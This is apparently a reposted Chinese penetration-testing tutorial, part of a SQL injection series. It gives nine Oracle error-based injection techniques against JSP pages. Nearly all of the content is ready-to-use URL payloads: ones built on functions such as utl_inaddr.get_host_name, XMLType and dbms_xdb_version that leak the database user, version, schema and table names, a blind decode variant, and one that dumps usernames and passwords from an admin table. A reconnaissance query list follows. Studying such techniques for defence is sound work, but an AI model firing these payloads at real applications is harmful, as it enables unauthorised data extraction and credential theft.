搜索
80.网络安全渗透测试—[SQL注入篇19]—[Oracle+JSP-9种报错注入]
统计
  • 建站日期:2015-11-11
  • 文章总数:2410 篇
  • 评论总数:0 条
  • 分类总数:38 个
  • 最后更新:7月24日

80.网络安全渗透测试—[SQL注入篇19]—[Oracle+JSP-9种报错注入]

纸飞机-JAVA追梦 / / 0 评论 / 130 阅读 /0 赞
作者有点忙,还没写简介
本文阅读 2 分钟
首页 代码,C/C#/C++ 正文

我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!

一、Oracle+JSP 报错注入:9种

1、utl_inaddr.get_host_name()进行报错注入

爆用户名payload:?id=1 and 1=utl_inaddr.get_host_name((select user from dual))--

img

2、ctxsys.drithsx.sn()进行报错注入

爆用户名payload:?id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual))-- img

3、XMLType()进行报错注入

爆用户名payload:?id=1 and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select user from dual)%7c%7cchr(62))) from dual) is not null-- img

4、dbms_xdb_version.checkin()进行报错注入

爆库版本payload:?id=1 and (select dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) from dual) is not null -- img

5、bms_xdb_version.makeversioned()进报错注入

爆库名payload:?id=1 and (select dbms_xdb_version.makeversioned((select owner from all_tables where rownum=1)) from dual) is not null-- img

6、dbms_xdb_version.uncheckout()进行报错注入

爆库名(排除SYS)payload:?id=1 and (select dbms_xdb_version.uncheckout((select owner from all_tables where rownum=1 and owner <>'SYS')) from dual) is not null-- img

7、dbms_utility.sqlid_to_sqlhash()进行报错注入

爆表名payload:?id=1 and (SELECT dbms_utility.sqlid_to_sqlhash((select table_name from user_tables where rownum=1) is not null -- img

8、ordsys.ord_dicom.getmappingxpath()进行报错注入

爆表名(排除前四个)payload:?id=1 and 1=ordsys.ord_dicom.getmappingxpath((select table_name from user_tables where rownum=1 and table_name<>'LOGMNR_SESSION_EVOLVE$' and table_name<>'LOGMNR_GLOBAL$' and table_name<>'LOGMNR_GT_TAB_INCLUDE$'),user,user)-- img

9、decode进行报错注入

       这种方式更偏向布尔型注入,因为这种方式并不会通过报错把查询结果回显回来,仅是用来作为页面的表现不同的判断方法。

爆用户名的第一个字符payload:?id=1 and 1=(select decode(substr(user,1,1),'S',(1/0),0) from dual)-- img 爆用户名的第二个字符payload:?id=1 and 1=(select decode(substr(user,2,1),'Y',(1/0),0) from dual)-- img 爆用户名的第三个字符payload:?id=1 and 1=(select decode(substr(user,6,1),'m',(1/0),0) from dual)-- img

10、思考:如何爆出用户名和密码?

爆admin表的用户名和密码payload:?id=1 and 1=utl_inaddr.get_host_name((select (select username%7c%7cpassword from admin)from dual))-- img

11、可注入的SQL语句:

(1)获取当前数据库版本:select banner from sys.v_$version where rownum=1

(2)获取当前用户:select user from dual

(3)获取日志文件位置:select member from v$logfile where rownum=1

(4)获取Oracle服务器监听IP:select utl_inaddr.get_host_address from dual

(5)获取Oracle服务器sid实例名称(远程连接该服务的时候可能会需要):select instance_name from v$instance

(6)获取当前连接用户:select SYS_CONTEXT ('USERENV', 'CURRENT_USER')from dual

(7)定位文件位置:select name FROM V$DATAFILE
                    
(8)查库名:select owner from all_tables where rownum=1

(9)查库名(排除SYS库):select owner from all_tables where rownum=1 and owner <>'SYS'

(10)查表名:select table_name from user_tables where rownum=1

(11)查表面(排除ADMIN表):select table_name from user_tables where rownum=1 and table_name<>'ADMIN'

(12)查列名:select column_name from user_tab_columns where table_name='ADMIN' and rownum=1

(13)查列名(排除ID列):select column_name from user_tab_columns where table_name='ADMIN' and rownum=1 and column_name<>'ID'

(14)查字段值(username||password):select username%7C%7Cpassword from admin
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/122611884
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

随机推荐

框架学习必备!java基础学习之《反射》

云原生之混合云网络互联

使用命令部署Java项目的基本步骤

拳打电脑管家,脚踢金山毒霸,3分钟用Python撸一个杀毒软件

发表评论

成为第一个评论的人

热门文章

1
Go语言实现MSF免杀上线、思路可转换自己生成马进行绕过免杀!
1.3k 阅读 ,
2
免杀 编译shellcode进行绕过杀软操作!
1.1k 阅读 ,
3
远控免杀系列文章与工具
1k 阅读 ,
4
WEBSEC-信息收集--第一篇
920 阅读 ,

标签TAG

最近回复

我要留言